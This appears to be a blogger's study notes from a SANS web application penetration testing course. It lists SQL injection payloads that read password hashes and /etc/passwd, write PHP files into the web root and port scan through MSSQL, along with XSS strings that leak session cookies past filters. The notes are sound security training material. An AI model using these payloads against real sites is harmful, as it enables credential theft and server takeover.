Inaccurate Design

SANS GWAPT Day 4: Exploitation

Thursday, 16 May 2013

Authentication Bypass

  • Attempt to forceful browse to pages that require authentication

    • Can do this manually or with automated tools
  • If a page returns a 302, check with Burp if it returns any other content

SQL Injection

  • Example SQL options

    • OR 1=1
    • OR 1>0
    • OR 1<\0

    • use ‘- - ’ (dash dash space) to drop everything after the query. The space is important!

    • Be sure to compate ints to ints and strings to strings

    • Can use LIMIT and ORDER BY to manipulate the orders

  • Stacked queries (ie. queries seperated by a semicolon) can be used to execute multiple queries

  • Union SELECT statements can join two SELECT statements together

    • Note that the SELECT statments need to have the same number of parameters
kevin' union select 1,2,3,4 -- # find out the columns being displayed
kevin' union select user(),version(),database() -- # adjust the amount of fields to get the union working
kevin' union select 1,1,user,password from mysql.user -- # adjust the amount of fields to get the union working

Using Files with SQL Injection

  • Highly dependant on the DB in use

  • Can read and write with the permissions of the database user (often www-data or root)

  • in MySQL

    • you can use load_file() to display a file from the filesystem
kevin' union select user(),version(),load_file('/etc/passwd'); -- 
  • can also use DUMPFILE to dump results to a file
kevin' union select user(),version() into outfile '/var/www/dump.txt'; -- 
  • This may result in an error ‘not a valid MySQL result resource’. This is becuase the statement doesn’t return any data

  • Can write arbitrary data to files on the OS

' union select '','' into outfile '/var/www/dump.php'; -- 
' union select '','' into outfile '/var/www/dump.php'; -- 

OS Interaction with SQL Injection

  • Various attacks

    • write results to file, TFTP out
    • write results to file, create new DB table, upload results to table, extract data with SELECT statements
  • Can attempts to re-enable cmdshell with sp_configure (only works if you’re sa user)

  • SQLMap can automate a lot of these tasks

  • Can portscan through an SQL injection

    • only works on MSSQL backends
    • the ‘OPENROWSET’ function allows you to retrieve data from another
SELECT * FROM OPENROWSET('SQLloldb', 'uid=sa; pwd=; network=DBNETLIB; Address=x.x.x.x,8888; timeout=5', 'select * from table'
  • If it returns ‘Doesn’t exist or access denied’ then not open
  • If it returns ‘Reported an error’ then it’s open

  • Prepared shells include PHPShell and AJAXShell

  • Same as normal SQL injection, but the errors are not displayed by the application

Cross Site Scripting

  • Difficult to exploit XSS in POST parameters

    • still doable, for example crafting a malicious flash package that sends the request
  • Can load Javascript from remote servers

  • Can post cookies to a server controlled by you

<script>document.write('<img src="'+document.cookie+'">');
  • Can use malformed tags, spaces, line breaks, etc to trick filters into accepting XSS
    • can quickly be used to post cookies to a sevrer controlled by the attacker
<IMG '''><script>alert('xss')'>
<B C=">" onmouseover="alert(document.location=''+document.cookie)" X="H E L L O !
  • Can encode quotes or the whole string in Hex, or HTML entities

  • Can use IFRAMES to perform basic postscanning

    • You can’t access the local IP address through JS, but you can with a Java Applet
  • Durzosploit can be used to generate payloads for XSS attacks

  • Can build Zombie botnets through XSS attacks

    • useful tool here is BEeF
    • can also use [AttackAPI]()

Limiting Targets of XSS attacks

  • Generally 5 possibilities
    • client-side code with Java app identifying IP address
    • client-side code with Attacker server identifying IP address
    • server-side code on the target server
    • server-side code on the attacker server
    • attacher infrastructure configuration

Session Fixation Attacks

  • Premise is that the sesison ID does not change after the user logs in

    1. Attacker can craft a link containing a session ID
    2. Target logs in
    3. Attacker knows session ID and can hijack the session.
  • Only fix is to change session cookie when the user logs in

Cross Site Request Forgery

  • [MonkeyFix]() is a tool that will host XSRF exploits for testing
    • will attack based on referrer
    • able to launch attack transparently while redirecting user to a destination site